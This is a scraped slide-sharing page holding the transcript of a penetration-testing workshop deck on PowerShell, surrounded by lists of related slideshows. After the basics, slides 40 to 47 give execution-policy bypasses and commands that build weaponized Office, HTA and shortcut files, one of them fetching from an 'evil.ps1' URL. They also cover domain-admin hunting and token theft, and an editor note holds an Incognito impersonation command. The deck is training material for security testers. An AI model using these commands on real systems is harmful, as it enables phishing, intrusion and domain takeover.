PowerShell from *nix user perspective
PowerShell from *nix user perspectivePowerShell from *nix user perspective
PowerShell from *nix user perspective
 
Managing Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShellManaging Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShell
 
PowerShell UIAtomation
PowerShell UIAtomationPowerShell UIAtomation
PowerShell UIAtomation
 
PowerShell 101
PowerShell 101PowerShell 101
PowerShell 101
 
Getting Started With PowerShell Scripting
Getting Started With PowerShell ScriptingGetting Started With PowerShell Scripting
Getting Started With PowerShell Scripting
 
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShell
 
Geek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL ServerGeek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL Server
 
Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015
 
Network Mapping with PowerShell
Network Mapping with PowerShellNetwork Mapping with PowerShell
Network Mapping with PowerShell
 
Practical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional PeoplePractical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional People
 
PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!
 

Semelhante a Workshop: PowerShell for Penetration Testers

PHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckPHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckrICh morrow
 
Mastering PowerShell Testing with Pester
Mastering PowerShell Testing with PesterMastering PowerShell Testing with Pester
Mastering PowerShell Testing with PesterMark Wragg
 
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...anshkhurana01
 
Property Based Testing in PHP
Property Based Testing in PHPProperty Based Testing in PHP
Property Based Testing in PHPvinaikopp
 
Developer testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing FanaticDeveloper testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing FanaticLB Denker
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShellBoulos Dib
 
PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2Bryan Cafferky
 
DEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easyDEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easyFelipe Prado
 
ONOS System Test - ONS2016
ONOS System Test - ONS2016ONOS System Test - ONS2016
ONOS System Test - ONS2016Suibin Zhang
 
Power shell for sp admins
Power shell for sp adminsPower shell for sp admins
Power shell for sp adminsRick Taylor
 
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment OptionsNagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment OptionsNagios
 
PowerShellForDBDevelopers
PowerShellForDBDevelopersPowerShellForDBDevelopers
PowerShellForDBDevelopersBryan Cafferky
 
Flask With Server-Sent Event
Flask With Server-Sent EventFlask With Server-Sent Event
Flask With Server-Sent EventTencent
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Test in action week 2
Test in action week 2Test in action week 2
Test in action week 2Yi-Huan Chan
 

Semelhante a Workshop: PowerShell for Penetration Testers (20)

PHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckPHP from soup to nuts Course Deck
PHP from soup to nuts Course Deck
 
Bsides tampa
Bsides tampaBsides tampa
Bsides tampa
 
Mastering PowerShell Testing with Pester
Mastering PowerShell Testing with PesterMastering PowerShell Testing with Pester
Mastering PowerShell Testing with Pester
 
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
 
From P0W3R to SH3LL
From P0W3R to SH3LLFrom P0W3R to SH3LL
From P0W3R to SH3LL
 
Property Based Testing in PHP
Property Based Testing in PHPProperty Based Testing in PHP
Property Based Testing in PHP
 
Developer testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing FanaticDeveloper testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing Fanatic
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShell
 
PowerShell-1
PowerShell-1PowerShell-1
PowerShell-1
 
PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2
 
DEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easyDEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easy
 
Ansible
AnsibleAnsible
Ansible
 
ONOS System Test - ONS2016
ONOS System Test - ONS2016ONOS System Test - ONS2016
ONOS System Test - ONS2016
 
Power shell for sp admins
Power shell for sp adminsPower shell for sp admins
Power shell for sp admins
 
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment OptionsNagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
 
PowerShellForDBDevelopers
PowerShellForDBDevelopersPowerShellForDBDevelopers
PowerShellForDBDevelopers
 
Flask With Server-Sent Event
Flask With Server-Sent EventFlask With Server-Sent Event
Flask With Server-Sent Event
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
coLearning PHP
coLearning PHPcoLearning PHP
coLearning PHP
 
Test in action week 2
Test in action week 2Test in action week 2
Test in action week 2
 

Último

TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditSkynet Technologies
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 

Último (20)

TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance Audit
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 

Workshop: PowerShell for Penetration Testers

  • 2. Get-Host • Hacker, Trainer, Speaker, Penetration Tester • Creator of Kautilya and Nishang. • Twitter: @nikhil_mitt • Blog – http://labofapenetrationtester.com • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous talks: Defcon, Blackhat, Troopers, DeepSec, EuSecwest, Hackfest, PHDays etc. 2PowerShell for Penetration Testers HITB
  • 3. $PFPTLab = Get-Content • What is PowerShell • Why PowerShell • Executing commands, scripts and modules • Extended PowerShell usage • A Penetration Testing Scenario • Defenses 3PowerShell for Penetration Testers HITB
  • 4. $PFPTLab | Format-Custom • This is a hands-on workshop, keep your Windows machines/VMs ready. • We will stick to PowerShell v2, unless specified otherwise. • For language basics, we will go with bare minimum to be able to cover interesting stuff in couple of hours. • The workshop assumes zero knowledge of PowerShell so if you know something: do {Start-Sleep –s 60} while {$SomethingNew –ne $true} 4PowerShell for Penetration Testers HITB
  • 5. $PFPTLab | where-object {$_ -eq “What is PowerShell"} • “Windows PowerShell® is a task-based command- line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.” http://technet.microsoft.com/en- us/library/bb978526.aspx 5PowerShell for Penetration Testers HITB
  • 6. $PFPTLab | where-object {$_ -eq “Why PowerShell"} • Present by default on modern Windows OS. • Tightly integrated with Windows and allows interaction with .Net, Filesystem, Registry, API, Certificates, COM, native commands, network, domain etc. • Expandable with use of .Net framework. • Easy to learn. • Less dependency on *nix based tools. • Trusted by System Admins, Blue Teams and (mostly) AV etc. 6PowerShell for Penetration Testers HITB
  • 7. Why PowerShell? PowerShell for Penetration Testers HITB 7 http://www.quickmeme.com/ONE-OF-US
  • 8. about_PowerShell.exe • powershell.exe is the console part of PowerShell. • Execute native commands, cmdlets, functions and scripts. • Supports tab completion, command aliases, Operators etc. • Provides various options and execution parameters. 8PowerShell for Penetration Testers HITB
  • 9. Invoke-HandsOn • Try running powershell.exe and Write-Output “Hello World” • Try usual bash and cmd commands. 9PowerShell for Penetration Testers HITB
  • 10. $PFPTLab | where-object {$_ -eq “powershell.exe"} • powershell.exe is the console part of PowerShell. • Execute native commands, cmdlets, functions and scripts. • Supports tab completion, command aliases, Operators etc. • Provides various options and execution parameters. 10PowerShell for Penetration Testers HITB
  • 11. Get-Help Get-Help • Easy to use and very useful. • This is the first place to go for learning something new or looking for solution to a problem. • Detailed help for cmdlets, conceptual topics, scripts, functions and modules. • Supports wildcards. • You may need to run Update-Help (v3 onwards). 11PowerShell for Penetration Testers HITB
  • 12. Get-Help Get-Help • Use with about_* to list help about a conceptual topic. • Various parameters could be passed to Get-Help Get-Help Get-Help –Full Get-Help Get-Command -Examples 12PowerShell for Penetration Testers HITB
  • 13. $Exercise[0] 1. Use PowerShell help system to list everything available. 2. List help about “process”. 3. List help about powershell.exe conceptual topic. 13PowerShell for Penetration Testers HITB
  • 14. $PFPTLab | where-object {$_ -eq “cmdlets"} • A Cmdlet is pronounced as “command let”. • Cmdlets are task based compiled .Net classes. • Certainly one of the best features of PowerShell. • They follow a Verb-Noun naming convention. • Cmdlets have aliases. • Like every other command in PowerShell, cmdlets return objects. 14PowerShell for Penetration Testers HITB
  • 15. $PFPTLab | where-object {$_ -eq “cmdlets"} • Explore cmdlets Get-Command –CommandType Cmdlet • Explore cmdlets based on a verb Get-Command –Verb Get • Get-Command also supports wildcards. 15PowerShell for Penetration Testers HITB
  • 16. Invoke-HandsOn • I need a count shout for number of Cmdlets you have on your machine. Get-Command –CommandType Cmdlet | Measure-Object • As you can see, PowerShell supports the pipe (|) operator as well. 16PowerShell for Penetration Testers HITB
  • 17. $Exercise[1] 1. I need names of three cmdlets each from everyone which can be useful in Penetration Tests. 17PowerShell for Penetration Testers HITB
  • 18. about_Windows_PowerShell_ISE • A GUI Scripting environment. • Tab completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features. • PowerShell scripts have .ps1 extension. 18PowerShell for Penetration Testers HITB
  • 19. Invoke-HandsOn 1. Write a script which prints Hello World. 2. Save it and execute it. 19PowerShell for Penetration Testers HITB
  • 21. about_Execution_Policies • Execution Policy is present to stop a user from accidently running scripts. • There are numerous ways to bypass it: powershell.exe –ExecutionPolicy bypass .script.ps1 powershell.exe –EncodedCommand <> powershell.exe –c <> Read: 15 ways to bypass PowerShell execution policy https://www.netspi.com/blog/entryid/238/15-ways-to- bypass-the-powershell-execution-policy 21PowerShell for Penetration Testers HITB
  • 22. $PFPTLab | where-object {$_ -eq “Variables"} • Variables are declared in the form $varname. • Variables can hold outputs from Cmdlets, native commands, functions etc. as each one returns an object or array of objects. Examples: $DirList = Get-Childitem $UserList = & "net" "user" 22PowerShell for Penetration Testers HITB
  • 23. $PFPTLab | where-object {$_ -eq “Types"} • PowerShell is not strictly typed. • You need not specify the Type of a variable. • If required, Type conversion could be done with the cast [] operator. 23PowerShell for Penetration Testers HITB
  • 24. $PFPTLab | where-object {$_ -eq “Statements"} • Conditional Statements – If, else, elseif, Switch • Loop Statements – while() {}, do {} while(), do {} until(), for(;;){}, foreach ( in ){} – ForEach-Object 24PowerShell for Penetration Testers HITB
  • 25. $PFPTLab | where-object {$_ -eq “Functions"} • Basic Declaration function <function_name> ( param1, param2) { do stuff } • Calling a function <function_name> <value1> <value2> • param statement provides advanced attributes for function parameters. 25PowerShell for Penetration Testers HITB
  • 27. $PFPTLab | where-object {$_ -eq “Basics of Modules"} • A simplest module is a PowerShell script with the extension .psm1 • Use Get-Module -ListAvailable to list modules. • Use Import-Module <modulepath>to import a module. • Use Get-Command –Module <Modulename> to list functions exported by a module. 27PowerShell for Penetration Testers HITB
  • 28. $Exercise[2] 1. Convert the script Check-RegistryKey.ps1 to a script module. 2. Try importing the module and use its functions. 28PowerShell for Penetration Testers HITB
  • 29. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} • Most powerful feature of PowerShell. Great to extend the existing capabilities of PowerShell. • Useful for loading .Net assemblies, using Windows API, using .Net code and classes in a PowerShell script. 29PowerShell for Penetration Testers HITB
  • 30. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Exploring .Net classes $ProcClass = [AppDomain]::CurrentDomain.GetA ssemblies() | ForEach-Object {$_.GetTypes()}| where {$_.IsPublic -eq "True“} | where {$_.Name -eq “Process”} 30PowerShell for Penetration Testers HITB
  • 31. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Using .Net Classes • Static Methods $ProcClass | Get-Member –Static $ProcClass:: GetProcesses() 31PowerShell for Penetration Testers HITB
  • 32. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Using .Net Classes • Creating instance $WebClient = New-Object System.Net.WebClient $WebClient | Get-Member –MemberType Method $WebClient | Get-Member -Name DownloadString | Format-List * $WebClient.DownloadString("http://google.com") 32PowerShell for Penetration Testers HITB
  • 33. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} • Use Add-Type to add .Net code/classes and Windows API to a PowerShell script or session. • See New-DotnetCode.ps1 for example of using .Net code. 33PowerShell for Penetration Testers HITB
  • 34. $PFPTLab | where-object {$_ -eq WMI"} • WMI is a treasure trove for hackers. • PowerShell could be used to retrieve information from WMI as well execute commands and scripts. • Explore the cmdlets related to WMI Get-Command -CommandType Cmdlet – Name *wmi* 34PowerShell for Penetration Testers HITB
  • 35. $PFPTLab | where-object {$_ -eq WMI"} • To run a PowerShll command using WMI use: Invoke-WmiMethod -Class win32_process -Name create - ArgumentList "powershell -c Get-Process" –ComputerName <> 35PowerShell for Penetration Testers HITB
  • 36. $PFPTLab | where-object {$_ -eq COM"} • PowerShell can use COM Objects as well. • Limitless opportunities for automation! $ie = New-Object -ComObject internetexplorer.application $ie | Get-Member 36PowerShell for Penetration Testers HITB
  • 37. $PFPTLab | where-object {$_ -eq PenTest Scenario"} • Lets consider a Pen Test scenario: – The Goal of Penetration Test is to get access to get Domain Administrator access (not a very good goal but lets target it for this lab . – Server side attacks have been largely unsuccessful. – Msf payloads are being detected by Anti Virus and other countermeasures. 37PowerShell for Penetration Testers HITB
  • 38. $Exploitation = $PFPTLab | where- object {$_ -eq Exploitation"} • PowerShell is very useful in getting a foothold system in a target network. • The trust on PowerShell by system administrators and countermeasures like AV makes it an ideal tool for Exploitation. 38PowerShell for Penetration Testers HITB
  • 39. $Exploitation | where-object {$_ -eq Client Side Attacks"} • PowerShell is an ideal tool for client side attacks on a Windows platform. • It could be used for generating weaponized files for email phishing campaigns and drive by download attacks. • Lets use Client Side attack scripts from Nishang (https://github.com/samratashok/nishang) 39PowerShell for Penetration Testers HITB
  • 40. $Exploitation | where-object {$_ -eq Client Side Attacks"} • Generating weaponized MS Office Files Out-Word -Payload "powershell.exe - ExecutionPolicy Bypass -noprofile - noexit -c Get-Process“ Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 Out-Excel -Payload "powershell.exe –EncodedCommand <>“ 40PowerShell for Penetration Testers HITB
  • 41. $Exploitation | where-object {$_ -eq Client Side Attacks"} • Drive by download attacks Out-HTA -PayloadURL http://192.168.254.1/powerpreter.ps m1 -Arguments Check-VM • More weaponized files Out-CHM Out-Shortcut 41PowerShell for Penetration Testers HITB
  • 42. $Exploitation | where-object {$_ -eq Shells"} • Now that we can run successful client side attacks, we may need shell level access for further attacks. • PowerShell can be used to write shells as well. • Shells in PowerShell can be used with exploits to get access to the target machine. 42PowerShell for Penetration Testers HITB
  • 43. $Exploitation | where-object {$_ -eq Shells"} • Interactive PowerShell Shells from Nishang • Metasploit’s msfvenom - Meterpreter using PowerShell 43PowerShell for Penetration Testers HITB
  • 44. $PostExp = $PFPTLab | where-object {$_ -eq Post Exploitation"} • PowerShell is arguably one of the best tools around for Windows Post Exploitation. • We have an interactive PowerShell session on one of the machines on the target and various PowerShell tools can be used now. 44PowerShell for Penetration Testers HITB
  • 45. $PostExp | where-object {$_ -eq Domain Enumeration"} • We can use Powerview (https://github.com/Veil- Framework/PowerTools/tree/master/Power View) to enumerate the target domain. • The goal is to find a machine where a Domain Admin is logged in. 45PowerShell for Penetration Testers HITB
  • 46. $PostExp | where-object {$_ -eq Domain Enumeration"} • To find machines which have a domain admin logged in and the current user has access to that machine: Invoke-UserHunter –CheckAccess –Domain <targetdomain> 46PowerShell for Penetration Testers HITB
  • 47. $PostExp | where-object {$_ -eq Priv Escalation"} • Now we can use the Domain Admin token on the target machine using Invoke- TokenManipulation and some PowerShell hackery: Get-Process -id <DA process> | Invoke-TokenManipulation CreateProcess cmd.exe Invoke-TokenManipulation is a part of Powersploit (https://github.com/mattifestation/PowerSploit) 47PowerShell for Penetration Testers HITB
  • 48.
  • 49. $PFPTLab | where-object {$_ -eq Defenses"} • Log Log Log! • Monitor and Analyze the logs. • Understand flow/use of privileges and credentials in your environment. • If a determined attacker can break into any system, a determined system administrator can catch any attacker as well. 49PowerShell for Penetration Testers HITB
  • 50. $PFPTLab | where-object {$_ -eq Credits"} Credits/FF to PowerShell hackers (in no particular order) @obscuresec, @mattifestation, @JosephBialek, @Carlos_Perez, @Lee_Holmes, @ScriptingGuys, @BrucePayette, @dave_rel1k, @enigma0x3, @subTee, @harmj0y and other PowerShell bloggers and book writers. 50PowerShell for Penetration Testers HITB
  • 51. $PFPTLab | where-object {$_ -eq Closing Remarks"} • Bad guys are already using PowerShell, using it for security testing is imperative now. Both for red teams and blue teams. • PowerShell is the not the future of Windows Penetration Testing, it is the present. 51PowerShell for Penetration Testers HITB
  • 52. $PFPTLab | where-object {$_ -eq Self Promotion"} • Check out PowerShell for Penetration Testers two days trainings at: http://www.labofapenetrationtester.com/p/tr ainings.html#pfptschedule 52PowerShell for Penetration Testers HITB
  • 53. $PFPTLab | where-object {$_ -eq Feedback"} • Please fill the feedback form. • I am looking for contributors. • Nishang is available at https://github.com/samratashok/nishang • Follow me @nikhil_mitt • nikhil.uitrgpv@gmail.com • http://labofapenetrationtester.com/ 53PowerShell for Penetration Testers HITB

Notas do Editor

  1. http://blogs.technet.com/b/heyscriptingguy/archive/2010/11/11/use-powershell-to-work-with-the-net-framework-classes.aspx http://powershell.com/cs/blogs/ebookv2/archive/2012/03/27/chapter-20-loading-net-libraries-and-compiling-code.aspx
  2. http://www.darkoperator.com/blog/2013/2/6/introduction-to-wmi-basics-with-powershell-part-2-exploring.html
  3. http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
  4. www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
  5. http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
  6. Incognito: .\incognito.exe -h newpc -u domainuser -p <> execute -c BHARAT\Administrator cmd.exe